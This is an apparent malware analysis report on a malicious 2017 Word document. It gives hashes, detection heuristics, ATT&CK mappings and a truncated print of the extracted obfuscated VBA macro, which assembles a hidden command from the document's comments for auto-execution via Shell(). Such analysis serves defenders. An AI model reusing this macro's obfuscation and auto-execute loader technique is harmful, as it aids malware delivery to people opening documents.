Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c3fff626f931fff…

MALICIOUS

Office (OLE)

77.0 KB Created: 2017-10-12 13:49:00 Authoring application: Microsoft Office Word First seen: 2017-10-28
MD5: 4147656d10dd24d2f531dfd9c1409103 SHA-1: 8cf69e901c06a4699754910e931a72ce5e7b7455 SHA-256: 5c3fff626f931fff80d79e53fdbf41a591f8dc048df2c7b636aa2d7a388d8e63
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical heuristic firing, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which flags auto-executing macros with execution tokens. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' also confirms its malicious nature. The macro's obfuscated nature and reliance on the Shell function strongly suggest it's designed to download and execute a secondary payload.

Heuristics 7

  • ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6535 bytes
SHA-256: 73364453be2650949abcbd785f91e65cf5f9581b93f3024e0e085b5a68f29e06
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"

Sub wkARWtXtE()
WMibYioGF = "" + ASXzJq + XAvcw + bNFNMPdj + SdziRBw + "coMments" + ASXzJq + XAvcw + bNFNMPdj + SdziRBw + DazZTYn + XwSCAobS + qjbwXXAn + ztzfZI + nLjpQimT
wkUiKYb = Mid((jWFQJPvPS(WMibYioGF)), 13218, 105)
uOSilBQF = Right(Left((jWFQJPvPS(WMibYioGF)), 16666), 89)
lCVzSmkz = Mid((jWFQJPvPS(WMibYioGF)), 3920, 29)
LtIpVjkc = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 14700), 61)
TkPAIG = Mid((jWFQJPvPS(WMibYioGF)), 745, 84)
DITLOKQPc = Mid((jWFQJPvPS(WMibYioGF)), 8722, 37)
waYRW = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 7165), 155)
FcNEQ = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 3086), 198)
rEAmV = Right(Left((jWFQJPvPS(WMibYioGF)), 6059), 2)
jzwBHz = Mid((jWFQJPvPS(WMibYioGF)), 5285, 185)
ZGDzaImuStm = Right(Left((jWFQJPvPS(WMibYioGF)), 17921), 119)
aXwrf = Mid((jWFQJPvPS(WMibYioGF)), 832, 156)
FPcHzqMa = Mid((jWFQJPvPS(WMibYioGF)), 11883, 188)
ONWGCHA = Mid((jWFQJPvPS(WMibYioGF)), 1510, 181)
sEKiti = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 1035), 116)
IcwJbo = Right(Left((jWFQJPvPS(WMibYioGF)), 11698), 94)
KdwAjvMSCiY = Mid((jWFQJPvPS(WMibYioGF)), 12307, 167)
XQzYSSRvjjZ = Right(Left((jWFQJPvPS(WMibYioGF)), 8604), 25)
DzdGnZOMs = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 13108), 36)
Sdwsr = Mid((jWFQJPvPS(WMibYioGF)), 11212, 128)
JwNlMAl = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 13349), 128)
qwduWmC = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 5572), 93)
ovrzVi = Right(Left((jWFQJPvPS(WMibYioGF)), 15820), 33)
sFoVYDAUQP = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 10441), 60)
lcViEYO = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 6322), 29)
ijbFiClXK = Mid((jWFQJPvPS(WMibYioGF)), 15300, 139)
GaIfUzRvc = Mid((jWFQJPvPS(WMibYioGF)), 1211, 97)
WiYdM = Right(Left((jWFQJPvPS(WMibYioGF)), 17218), 51)
vzUPDK = Mid((jWFQJPvPS(WMibYioGF)), 5108, 91)
QuAPwG = Mid((jWFQJPvPS(WMibYioGF)), 7800, 112)
MLUqJEGTmJ = Mid((jWFQJPvPS(WMibYioGF)), 3331, 64)
tjAqLK = Right(Left((jWFQJPvPS(WMibYioGF)), 11424), 36)
KqWzFIjWu = Mid((jWFQJPvPS(WMibYioGF)), 1704, 74)
zktMSriD = Right(Left((jWFQJPvPS(WMibYioGF)), 5068), 186)
BdtiPSjuJE = Right(Left((jWFQJPvPS(WMibYioGF)), 8111), 101)
HdVoWkBUjY = Right(Left((jWFQJPvPS(WMibYioGF)), 2599), 32)
cZAThzcGY = Mid((jWFQJPvPS(WMibYioGF)), 18373, 78)
MdPppA = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 15146), 54)
JrIdPriUw = Mid((jWFQJPvPS(WMibYioGF)), 19737, 163)
HcENGqSP = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 15574), 110)
bfSSUI = Left(Right((jWFQJPvPS(WMibYioGF)), Len((jWFQJPvPS(WMibYioGF))) - 7033), 77)
vLUHn = Mid((jWFQJPvPS(WMibYioGF)), 2171, 146)
TwkcDiiDCh = Right(Left((jWFQJPvPS(WMibYioGF)), 4246), 51)
PJzWkP = Right(Left((jWFQJPvPS(WMibYioGF)), 14531), 171)
MpKviTNCr = Mid((jWFQJPvPS(WMibYioGF)), 18059, 199)
onZmtimJjwb = Right(Left((jWFQJPvPS(WMibYioGF)), 4181), 146)
mzvzvojsNi = Mid((jWFQJPvPS(WMibYioGF)), 2768, 157)
moujQbMzi = Right(Left((jWFQJPvPS(WMibYioGF)), 16245), 79)
pXFozFt = Mid((jWFQJPvPS(WMibYioGF)), 9077, 26)
YYIiYQHCS = Mid((jWFQJPvPS(WMibYioGF)), 10777, 145)
QCjTHGFDuN = wkUiKYb + uOSilBQF + lCVzSmkz + LtIpVjkc + TkPAIG + DITLOKQPc + waYRW + FcNEQ + rEAmV + jzwBHz + ZGDzaImuStm + aXwrf + FPcHzqMa + ONWGCHA + sEKiti + IcwJbo + KdwAjvMSCiY + XQzYSSRvjjZ + DzdGnZOMs + Sdwsr + JwNlMAl + qwduWmC + ovrzVi + sFoVYDAUQP + lcViEYO + ijbFiClXK + GaIfUzRvc + WiYdM + vzUPDK + QuAPwG + MLUqJEGTmJ + tjAqLK + KqWzFIjWu + zktMSriD + BdtiPSjuJE + HdVoWkBUjY + cZAThzcGY + MdPppA + JrIdPriUw + HcENGqSP + bfSSUI + vLUHn + TwkcDiiDCh + PJzWkP + MpKviTNCr + onZmtimJjwb
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.